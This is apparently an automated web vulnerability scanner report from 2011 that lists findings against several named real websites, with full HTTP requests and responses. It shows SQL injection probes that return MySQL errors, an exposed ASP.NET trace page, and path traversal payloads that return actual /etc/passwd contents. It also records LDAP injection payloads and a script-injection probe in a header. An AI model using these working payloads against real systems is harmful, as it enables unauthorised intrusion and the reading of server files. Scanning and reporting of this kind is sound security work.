Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.45. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2841'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.46. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2841/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2841/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:39 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

2. ASP.NET tracing enabled  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.hotwheelscollectors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:00 GMT
Server: MII-WSD/1.4
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Mon, 02 May 2011 02:14:01 GMT
Cache-Control: max-age=10800
Content-Type: text/html; charset=utf-8
Content-Length: 21443
Age: 2
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { font: 10pt verdana, arial; cellspacing:0; cellp
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

3. File path traversal  previous  next
There are 6 instances of this issue:


3.1. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The background_color parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ffffff../../../../../../../../etc/passwd%00ffffff was submitted in the background_color parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff../../../../../../../../etc/passwd%00ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.2. http://www.ibegin.com/weather/weather_widget.php [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The city parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Reston../../../../../../../../etc/passwd%00Reston was submitted in the city parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston../../../../../../../../etc/passwd%00Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:46:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.3. http://www.ibegin.com/weather/weather_widget.php [country parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The country parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload us../../../../../../../../etc/passwd%00us was submitted in the country parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us../../../../../../../../etc/passwd%00us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.4. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The font_family parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Verdana../../../../../../../../etc/passwd%00Verdana was submitted in the font_family parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana../../../../../../../../etc/passwd%00Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.5. http://www.ibegin.com/weather/weather_widget.php [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The state parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Virginia../../../../../../../../etc/passwd%00Virginia was submitted in the state parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia../../../../../../../../etc/passwd%00Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.6. http://www.ibegin.com/weather/weather_widget.php [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The type parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload js../../../../../../../../etc/passwd%00js was submitted in the type parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js../../../../../../../../etc/passwd%00js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

4. LDAP injection  previous  next
There are 3 instances of this issue:


4.1. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=* HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15355
X-Varnish: 542435617
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</li>
   <!--
   <li><a href="http://www.cricbuzz.com/icc-cricket-world-cup-2011" style="color:yellow;">ICC World Cup 2011 - New!</a></li>
   
       <li style="float:right;"><a href="http://ads.cricbuzz.com/adserver/adclick.php?bannerid=6764&zoneid=18&source=&dest=http%3A%2F%2Fspecials.cricbuzz.com%2Fipl%2F2010%2Fdspblack%2F" target="_blank" style="color:yellow;">Oomphire Videos</a></li>
   -->    
       <li id="blackberry_comm_show" style="float:right;"></li>    
   
</ul>

</div>

<script language="JavaScript" type="text/javascript" >
function loadBalance(url, matchid,source) {
   if(source == null){
       source = "flash"
   }
   var localServers = ["http://live.cricbuzz.com/live/scorecard/"];
   var localweightArray = [0,0,0,0,0,0,0,0,0,0];
   var localRange = 10;
   var lb = 0;
   try {
       if (hookServers) {
           localServers = hookServers;
           if (LBweightArray)
               localweightArray = LBweightArray;
           if (LBrange)
               localRange = LBrange;
           lb = $.cbz.commons.getRandom() % localRange;
           lb = localweightArray[lb];
       }
   } catch (err) {
   }
   var LBurl = localServers[lb];
   var referrer = window.top.location;
   $.getScript("http://ads.cricbuzz.com/adserver/counter/lb_logger.php?matchid="+ matchid + "&lb=" + LBurl + "&source=" + source + "&referrer=" + referrer);
   window.top.location = LBurl + url;
   return true;
}
</script>

</div>
               <style>

</style>

<div id="main">
<div class="column_left_66 " >
               <div class="column_content">
               <table cellspacing="0" width="100%" class="cbz_header_white" >
                   <tr>
                       <td class="cbz_white_header cbz_white_header_left"></td>
                       <td class="cbz_white_header cbz_white_header_center"></td>
                       <td class="cbz_white_header cbz_white_header_right"></td>
                   </tr>
               </table>
                       <div class="error_main">
                               <table cellspacing="0" width="100%" class="cbz_header_white" >
                                       <tr>
                                               <td class="cbz_white_header cbz_white_header_left"></td>
                                               <td class="cbz_white_header cbz_white_
...[SNIP]...

Request 2

GET /*)!(sn=* HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15616
X-Varnish: 542435619
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</li>
   <li><a href="http://live2.cricbuzz.com/live/scorecard/9935/Kolkata-Knight-Riders-vs-Kings-XI-Punjab-37th-match" onclick="return !loadBalance('9935/Kolkata-Knight-Riders-vs-Kings-XI-Punjab-37th-match', 9935,'menu');">KOL vs MOH
        - KOL won
   </a></li>
   <!--
   <li><a href="http://www.cricbuzz.com/icc-cricket-world-cup-2011" style="color:yellow;">ICC World Cup 2011 - New!</a></li>
   
       <li style="float:right;"><a href="http://ads.cricbuzz.com/adserver/adclick.php?bannerid=6764&zoneid=18&source=&dest=http%3A%2F%2Fspecials.cricbuzz.com%2Fipl%2F2010%2Fdspblack%2F" target="_blank" style="color:yellow;">Oomphire Videos</a></li>
   -->    
       <li id="blackberry_comm_show" style="float:right;"></li>    
   
</ul>

</div>

<script language="JavaScript" type="text/javascript" >
function loadBalance(url, matchid,source) {
   if(source == null){
       source = "flash"
   }
   var localServers = ["http://live.cricbuzz.com/live/scorecard/"];
   var localweightArray = [0,0,0,0,0,0,0,0,0,0];
   var localRange = 10;
   var lb = 0;
   try {
       if (hookServers) {
           localServers = hookServers;
           if (LBweightArray)
               localweightArray = LBweightArray;
           if (LBrange)
               localRange = LBrange;
           lb = $.cbz.commons.getRandom() % localRange;
           lb = localweightArray[lb];
       }
   } catch (err) {
   }
   var LBurl = localServers[lb];
   var referrer = window.top.location;
   $.getScript("http://ads.cricbuzz.com/adserver/counter/lb_logger.php?matchid="+ matchid + "&lb=" + LBurl + "&source=" + source + "&referrer=" + referrer);
   window.top.location = LBurl + url;
   return true;
}
</script>

</div>
               <style>

</style>

<div id="main">
<div class="column_left_66 " >
               <div class="column_content">
               <table cellspacing="0" width="100%" class="cbz_header_white" >
                   <tr>
                       <td class="cbz_white_header cbz_white_header_left"></td>
                       <td class="cbz_white_header cbz_white_header_center"></td>
                       <td class="cbz_white_header cbz_white_header_right"></td>

...[SNIP]...

4.2. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_search_box.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jobs_search_box.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/jobs4/javascript/jobs_search_box.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: 0e0741cd-f638-4e82-af66-b89bdca7d00c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/business/economy/running-in-the-red-how-the-us-on-the-road-to-surplus-detoured-to-massive-debt/2011/04/28/AFFU7rNF_story.html">Running in the red: How the U.S., on the road to surplus, detoured to massive debt</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/sports/redskins/nfl-draft-2011-redskins-add-nine-more-draft-picks-for-a-total-of-12/2011/04/30/AFTZo7NF_story.html">NFL draft 2011: Redskins add nine more draft picks for a total of 12</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/local/tornado-tally-at-19-for-maryland-and-virginia/2011/04/30/AFySjwOF_story.html">Tornado tally at 19 for Maryland and Virginia</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/world/libya-frontline-turns-quiet-as-rebels-regroup/2011/04/29/AFEwjwNF_story.html">Libya front line turns quiet as rebels regroup</a>
               </li>
           <li>
